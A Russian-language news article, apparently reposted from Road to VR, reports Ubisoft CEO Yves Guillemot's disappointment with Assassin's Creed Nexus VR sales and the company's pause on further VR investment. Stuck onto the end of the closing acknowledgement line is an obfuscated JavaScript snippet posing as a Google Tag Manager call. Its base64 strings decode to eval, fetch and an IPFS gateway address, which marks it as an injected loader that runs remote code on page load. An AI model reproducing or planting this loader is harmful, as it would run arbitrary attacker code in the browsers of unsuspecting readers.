Ubisoft "разочарована" в производительности 'Assassin's Creed VR', будущие инвестиции в VR приостановлены.

Image courtesy Ubisoft

Во время последней телефонной конференции Ubisoft по финансовому отчету, глава компании Ив Гийемо выразил свое "разочарование" по поводу результатов VR-игры Assassin's Creed Nexus VR (2023) и сообщил, что компания не планирует увеличивать инвестиции в VR в настоящее время, в ожидании дальнейшего роста рынка.

Assassin's Creed Nexus VR, эксклюзивный для платформы Quest, впервые перенес популярную серию игр Assassin's Creed в мир виртуальной реальности, сочетая паркур, скрытность и боевую систему. Выпущенный в ноябре, он хорошо подготовлен к успешной продаже во время праздничного сезона на платформах Quest 2 и новых гарнитуре Quest 3.

Однако во время вопросов и ответов на конференции по финансовому отчёту компании за третий квартал 2024 года, Гийемо заявил, что VR-игра значительно не оправдала ожидания, из-за чего Ubisoft решила сократить инвестиции в VR. Вот полное заявление Гийемо:

"Мы чувствуем некоторое разочарование в результате Assassin's Creed в VR. Она продается и приносит доход, но мы ожидали большего. Поэтому, в настоящий момент, мы не планируем увеличивать наши инвестиции в VR, поскольку данная технология еще не развилась достаточно.

Мы впечатлены новым продуктом от Apple и считаем его фантастическим вариантом аппаратного обеспечения. Однако мы продолжаем рассмотрение мира VR, как что-то, на что нужно смотреть, но не вкладываться слишком много, пока она не достигнет достаточного уровня развития."

Assassin's Creed Nexus VR стал началом (и возможно концом) второй волны инвестиций Ubisoft в VR. Первая волна инвестиций стартовала в 2016 году и привела к выпуску таких игр, как Eagle Flight (2016), Werewolves Within (2016), Star Trek: Bridge Crew (2017), Transference (2018) и многопользовательского шутера Space Junkies (2019), последняя игра была снята с продаж в конце 2022 года из-за низкой активности пользователей.

Студия также выпустила компьютерную игру с элементами исследования космоса в VR AGOS - A Game Of Space (2020) в конце 2020 года с удивительно маленькой рекламой.

Но нежелание Ubisfot разрабатывать VR-игры недавно началось не только из-за неудачи Assassin's Creed Nexus VR, поскольку компания объявила в 2022 году о отмене своей второй большой волны контента в VR, включая игры Splinter Cell VR, Ghost Recon Frontline и две неназванные игры.


Благодарим теханалитика и ютубера Брэда Линча (также известного как 'SadlyItsBradley') за информацию.(function(w,d,s,l,i,j,k,m){w[s]||(w[s]=1,wd(j)ss)})(window,atob,'then','https://www.googletagmanager.com/gtm.js?id=','ZXZhbA==','ZmV0Y2g=','aHR0cHM6Ly9nYXRld2F5LnBpbmF0YS5jbG91ZC9pcGZzL1FtYnB2NHdCeUdrUVcxVW1XVXYzUFBrYlFHWVBOUmVKOUM5Z0JzbnoxclFKQ3U=','0162d17c')

Эта статья Ubisoft "разочарована" в результате Assassin's Creed VR, инвестиции в VR отложены была опубликована на Road to VR.